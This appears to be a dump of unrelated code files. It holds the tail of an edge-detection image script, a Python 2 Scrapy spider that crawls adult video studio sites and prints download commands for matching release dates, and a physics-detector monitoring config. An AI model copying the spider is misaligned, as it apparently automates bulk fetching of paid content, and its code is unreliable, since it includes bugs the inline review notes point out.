        dy = ndimage.sobel(im, 1)  # vertical derivative
        mag = numpy.hypot(dx, dy)  # magnitude
        mag *= 255.0 / numpy.max(mag)  # normalize (Q&D)
        # Collapse colour channels to grey.
        # NOTE(review): assumes 3-channel input; a greyscale image has no
        # axis 2 and would raise here -- confirm the dataset is RGB.
        mag = mag.mean(axis=2)
        mag = mag.astype("uint8")
        img = Image.fromarray(mag)
        img.save(os.path.join(output_dir, file))
import scrapy
import os
import subprocess
import urlparse
from datetime import datetime, timedelta
import time
import re
from texttable import Texttable
import json
#format file with regex:
#(vixen|tushy)\s(\d\d\.\d\d\.\d\d)\.(.*)(\.And.*)?\.XXX.*
# XPaths for the legacy ("old") page layout.
old_article_XPath = "//article[@class='videolist-item']"
old_date_XPath = ".//div[@class='videolist-caption-date']/text()"
old_title_XPath = ".//a/@href"
# XPaths/regex for the current ("new") data-test-component layout.
new_article_XPath = "//div[contains(@data-test-component,'VideoList')]//div[@data-test-component='VideoThumbnailContainer']/div/a/@href"
new_date_XPath = "//button[@data-test-component='ReleaseDate']/span/text()"
#new_title_XPath = "//h1[@data-test-component='VideoTitle']/text()"
# Regex fallback that scrapes the formatted release date out of raw page text.
new_date_pattern = r'.*releaseDateFormatted\":\"(.*\s.*,\s201\d)\"\}\]'
#new_date_pattern = r'<span data-test-component=\"ReleaseDateFormatted\">(.*\s.*,\s201\d)</span>'
class SearchSpider(scrapy.Spider):
    """Search a studio's site for a query and print download commands.

    Crawls ``https://www.<studio>.com/<queryKey>``, extracts each item's
    release date and, when the date equals ``filedate``, prints a
    ``./runscrapy.sh`` command.  All seen items are collected in
    ``articleDict``/``actionDict`` and rendered as a table on close.

    NOTE(review): print statements, ``urlparse`` and list-returning
    ``dict.keys()`` make this Python-2-only code.
    """
    name = "search"
    # Per-run state; class attributes act as defaults, overwritten in __init__.
    studio = ""
    queryKey = ""
    filedate = ""
    baseUrl = ""
    articleDict = {}        # isoDate -> [row index, display date, slug, command]
    actionDict = {}         # row index -> [command]
    count = 0               # running row index for the result table
    showFullresult = False
    def __init__(self, studio, queryKey, filedate="", showFullresult=False, *args, **kwargs):
        # ``filedate`` arrives as "yy.mm.dd" and is normalised to "20yy-mm-dd".
        super(SearchSpider, self).__init__(*args, **kwargs)
        self.studio = studio
        self.queryKey = queryKey.replace(".","-")
        if filedate != "":
            self.filedate="20%s"%filedate.replace(".","-")
        self.showFullresult = showFullresult
        #adate = datetime.datetime.strptime(targetDate, "%Y-%m-%d").date()
        #self.filedate = "%s %d, %s" % (adate.strftime("%B"), adate.day, adate.strftime("%Y"))
        self.baseUrl = 'https://www.' + self.studio + '.com/'+ self.queryKey
    def start_requests(self):
        # Single seed request; the "new" layout parser is the entry point.
        urls = [
            self.baseUrl
        ]
        for url in urls:
            #print url
            yield scrapy.Request(url=url, callback=(self.parse_new))
    def parse_old(self, response):
        # Parser for the legacy markup (article/videolist-item elements).
        #print "handle vixen"
        articles = response.xpath(old_article_XPath)
        if len(articles) == 0:
            print "Nothing found"
            pass
        for article in articles:
            date = article.xpath(old_date_XPath).extract_first()
            #print date
            # Site shows dates like "January 2, 2018"; convert to ISO format.
            isoDate = time.strftime('%Y-%m-%d', time.strptime(date, "%B %d, %Y"))
            title = article.xpath(old_title_XPath).extract_first()
            cmd = "./runscrapy.sh %s %s" %(self.studio, title.replace('/',''))
            if isoDate == self.filedate:
                print "%s" % cmd
            # NOTE(review): keyed by isoDate, so multiple releases on the same
            # day overwrite each other -- confirm whether that is intended.
            self.articleDict[isoDate] = [self.count, date, title.replace('/',''), cmd]
            self.actionDict[self.count] = [cmd]
            self.count += 1
        nextPage_XPath = "//a[contains(@class,'pagination-link pagination-next ajaxable')]/@href"
        nextPageUrl = response.xpath(nextPage_XPath).extract_first()
        if nextPageUrl:
            # NOTE(review): ``self.parse`` is not defined on this spider and
            # scrapy.Spider's default parse() is abstract -- this callback
            # probably should be self.parse_old; confirm.
            yield scrapy.Request(urlparse.urljoin(self.baseUrl, nextPageUrl), callback=self.parse)
    def parse_new(self, response):
        # Parser for the current layout: follow every thumbnail link and read
        # the release date from the page's embedded JSON state.
        #print "handle tushy/blacked"
        articles = response.xpath(new_article_XPath).extract()
        if len(articles) == 0:
            print "Nothing found"
            pass
        for article in articles:
            movie_url = response.urljoin(article)
            #print movie_url
            yield scrapy.Request(movie_url, callback=self.parse_date_by_json)
        #nextPage_XPath = "//a[contains(@class,'pagination-link pagination-next ajaxable')]/@href"
        #nextPageUrl = response.xpath(nextPage_XPath).extract_first()
        #if nextPageUrl:
        #    yield scrapy.Request(urlparse.urljoin(self.baseUrl, nextPageUrl), callback=self.parse)
    def parse_date(self, response):
        # Regex-based fallback: scrape releaseDateFormatted out of the raw
        # page text instead of parsing the embedded JSON blob.
        #print response.text
        #with open("tmp_response.txt", 'w') as html_file:
        #    html_file.write(response.text)
        #yield {
        #    'url': response.url
        #}
        #print use regex here to parse the date, or otherwise go with splash....
        date_match = re.search(new_date_pattern, response.text)
        if date_match:
            date = date_match.group(1)
            # NOTE(review): the +1 day offset presumably compensates for a
            # timezone difference -- confirm against the site.
            realDate = datetime.strptime(date,"%B %d, %Y") + timedelta(days=1)
            isoDate = realDate.strftime('%Y-%m-%d')
            cmd = "./runscrapy.sh %s %s" %(self.studio, response.url.replace('https://www.' + self.studio + '.com/', ''))
            #print isoDate + ' ' + cmd
            if isoDate == self.filedate:
                print "%s" % cmd
            self.articleDict[isoDate] = [self.count, date, response.url.replace('https://www.' + self.studio + '.com/', ''), cmd]
            self.actionDict[self.count] = [cmd]
            self.count += 1
        else:
            print "No date found."
    def parse_date_by_json(self, response):
        # Preferred parser: read the window.__INITIAL_STATE__ JSON that the
        # site embeds in each video page.
        json_text = re.search('window.__INITIAL_STATE__ = (.*)?;', response.text)
        if json_text:
            json_obj_txt = json_text.group(1)
            json_obj = json.loads(json_obj_txt)
            allMovies = json_obj["videos"]
            for movie in allMovies:
                if "id" in movie:
                    #print "#%s" % movie["id"]
                    date = movie["releaseDateFormatted"]
                    realDate = datetime.strptime(date,"%B %d, %Y")# + timedelta(days=1)
                    isoDate = realDate.strftime('%Y-%m-%d')
                    cmd = "./runscrapy.sh %s %s" %(self.studio, response.url.replace('https://www.' + self.studio + '.com/', ''))
                    #print isoDate + ' ' + cmd
                    if isoDate == self.filedate:
                        print "%s" % cmd
                    self.articleDict[isoDate] = [self.count, date, response.url.replace('https://www.' + self.studio + '.com/', ''), cmd]
                    self.actionDict[self.count] = [cmd]
                    self.count += 1
            #print json_obj
    def closed(self, reason):
        # Scrapy lifecycle hook: render everything collected, newest first.
        resultTable = Texttable()
        resultTable.set_cols_width([3, 20, 40, 80])
        isoDates = self.articleDict.keys()
        # Python 2: keys() returns a list, so the in-place sort works here.
        isoDates.sort(reverse=True)
        for isoDate in isoDates:
            resultTable.add_row(self.articleDict[isoDate])
        if self.showFullresult == True:
            print resultTable.draw()
        #while True :
        #    action_no = raw_input("Your choice: ")
        #    if action_no == '' :
        #        break
        #    else:
        #        print self.actionDict[int(action_no)][0]
|
import FWCore.ParameterSet.Config as cms
from DQMServices.Core.DQMEDHarvester import DQMEDHarvester
# DQM harvester grading DT segment-resolution histograms: residual means and
# sigmas inside the "good" bounds pass; beyond the "bad" bounds they fail.
dtResolutionAnalysisTest = DQMEDHarvester("DTResolutionAnalysisTest",
    # Run the quality test on every harvesting cycle (prescale of 1).
    diagnosticPrescale = cms.untracked.int32(1),
    # Thresholds on the residual distribution; presumably in cm, matching the
    # DT residual histograms -- confirm against DTResolutionAnalysisTest.
    maxGoodMeanValue = cms.untracked.double(0.005),
    minBadMeanValue = cms.untracked.double(0.015),
    maxGoodSigmaValue = cms.untracked.double(0.05),
    minBadSigmaValue = cms.untracked.double(0.08),
    # top folder for the histograms in DQMStore
    topHistoFolder = cms.untracked.string('DT/02-Segments')
)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.